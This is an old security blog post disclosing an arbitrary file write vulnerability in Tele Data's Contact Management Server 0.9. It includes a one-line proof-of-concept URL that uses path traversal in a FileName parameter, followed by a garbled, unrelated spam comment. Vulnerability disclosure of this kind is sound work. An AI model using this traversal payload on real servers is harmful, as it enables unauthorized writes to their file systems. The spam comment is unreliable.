This site is soon to be deprecated by http://www.johnleitch.net

Sunday, May 23, 2010

Tele Data's Contact Management Server 0.9 Arbitrary File Write

An arbitrary file write vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to write to the local file system of the server.

PoC
Login as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Save&SQL=hello%20world&FileName=..\..\..\..\..\..\..\..\..\x.txt

1 comment:

  1. estimated 9 million out LGBT people in the US alone. That estimate reflects only a slightly less thsboan 4% of the entire population, yet we hear

    ReplyDelete